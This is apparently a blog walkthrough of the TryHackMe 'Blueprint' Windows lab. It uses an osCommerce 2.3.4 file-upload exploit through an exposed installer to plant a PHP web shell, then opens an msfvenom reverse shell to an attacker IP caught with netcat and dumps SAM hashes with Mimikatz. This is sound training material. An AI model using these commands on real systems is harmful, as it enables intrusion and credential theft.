TryHackMe "Blueprint" Exploitation - No Metasploit Version

Blueprint, another Windows challenge from TryHackMe (https://tryhackme.com/room/blueprint), requires the user to use their scanning and enumeration skills, along with being curious enough to click through links and directories to be successful.  In today's walkthrough we will show you the manual way to exploit this Windows machine, secure the required NTLM hash, and find the Root flag for submission.  So let's get started!

Scanning

As usual, let's run our Nmap scan followed by the -A scan for additional information.  

nmap 10.10.43.200

nmap -A -p80,135,139,445,3306,8080 10.10.43.200

The machine is pretty straight forward, has a combination of SMB and web server elements.  Of note is the MariaDB server running on 3306.  This suggests there is a database somewhere that is available to on the frontend.  Either way, now that we know what we are looking at, let's enumerate.

Enumeration

I usually go for the web servers first to see what is happening there.  The port 80/443 server revealed nothing, however a visit to the 8080 port address showed the following.

10.10.43.200:8080 with information disclosure

As we see the banner information is available, as well as this folder called "oscommerce-2.3.4."  If we click on this we are taken to the following directory.

Clicking the catalog/ directory further moves us into the website, allowing us at least a partial version of the unloaded contents.

/catalog/ directory with website contents

Unfortunately our path sort of slows here.  Let's run Dirsearch quick to see if we can find any subdirectories of interest.

python3 dirsearch.py -u http://10.10.43.200:8080/oscommerce-2.3.4 -e php,cgi,html,txt,exe -x 400,401,403 -r -R 3 t 100

 Interesting /install directory found

We really need to dig deeper into the oscommerce-2.3.4 service itself to understand the exploitation side.  A searchsploit search showed the following.

searchsploit oscommerce 2.3.4 results; Notice Arbitrary File Upload

The results show that there may be a possibility of an Arbitrary File Upload vulnerability in the service.  Let's see what the exploit is all about.  First we can copy it to our working directory and see what it does if we run it.  After that, let's "cat" it and see what the contents tell us we need to do.

Script copy and run for help commands

cat 43191.py

If we visit that /install/ directory we found earlier, we see what appears to be a front end dashboard that allows us to create or initiate a database.  Let's start exploiting.

Exploitation

After reading the requirements for the exploit, it's clear that we need to be a privileged user in order to be successful.  As we have found the below insecure dashboard page, we can attempt to create that user.  We begin by clicking start.

Dashboard to allow installation and configuration of database

 So this is obviously interesting.  We shouldn't normally have the ability to initiate this ourselves.  Clicking start moves us another step.

Basic Server settings

 Initialization message

 Results; Click continue

Credential creation

We have now successfully initiated the server and created our username and password necessary for the exploit to work properly (this exploit requires authenticated user access).  Now we need something to upload that we can use to attempt a possible remote code execution attack.  A simple PHP script uploaded with the exploit should work if we're lucky.

PHP script to allow browser address bar RCE

Now we can start with the exploit and attempt to upload it.

python 43191.py -u http://10.10.43.200:8080/oscommerce-2.3.4 --auth=admin:admin -f shell.php

We run the command and see that the upload was successful.  Additionally we are provided with a link that we can utilize in our browser.  Let's head to our browser and try to use our PHP script to execute a command.

/shell.php?cmd=whoami

 

And we have been successful not only with the upload, but also with the Remote Code Execution.  We see that we are also a system user.  We also know that we have file upload abilities.  Let's write an msfvenom payload that we can grab a reverse shell with, and then run it.

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.1.198 LPORT=5555 -f exe > shell.exe; Note the python exploit command as well

Now all we need to do is start a Netcat listener to catch the shell, and visit the link we were given above to fire it off.

nc -nlvp 5555 to reverse shell; Visited link in Browser to execute command

 And we now have system level shell access to the machine.  The rest of the challenge is mostly trivial, and I will walk you through how to grab the NTLM hash and the final flag.  First, we can once again use our exploit to upload a tool called "Mimikatz," which should be on your machine by default (locate mimikatz from a command terminal in Kali to find it).  But first, we need to know what the system architecture is on the target machine as Mimikatz as an x64 and x86 version.  Let's do that quick using systeminfo.

systeminfo x86 architecture shown

Now that we know our architecture we can grab the correct version of Mimikatz, copy it to our working directory, and use the exploit to upload it.  Additionally we cn check the directory to ensure it uploaded properly as shown below.

Mimikatz uploaded and confirmed

Mimikatz is a complex tool that we won't cover in much detail today.  For the purpose of our challenge, we will simply execute it to get the Mimikatz prompt, and then run lsadump::sam to reveal the hashes.

mimikatz_x86.exe; lsadump::sam

Great!  We know have the hash that we need for the challenge.  Copy it and crack it.  In this instance, I go for quick wins and try a few different online hash cracking sites to find it.  CrackStation had this one already.

CrackStation has cracked

Finally we need to get the root.txt flag.  This is normally on the Administrator's Desktop.  Changing directory there shows us the flag file.  Use the more command to reveal the contents, and submit it to the dashboard.  Congratulations on completing the room!

more root.txt.txt

Final Thoughts

Blueprint was another great opportunity to take what would normally be an easy Metasploit exploitation, and use a lesser traveled manual exploit instead to finish.  Mimikatz is an incredibly powerful tool that can be leveraged in many ways, and I encourage you to learn about it more on your own.  I hope this walkthrough guide has helped you along your way, and I'll see you next time!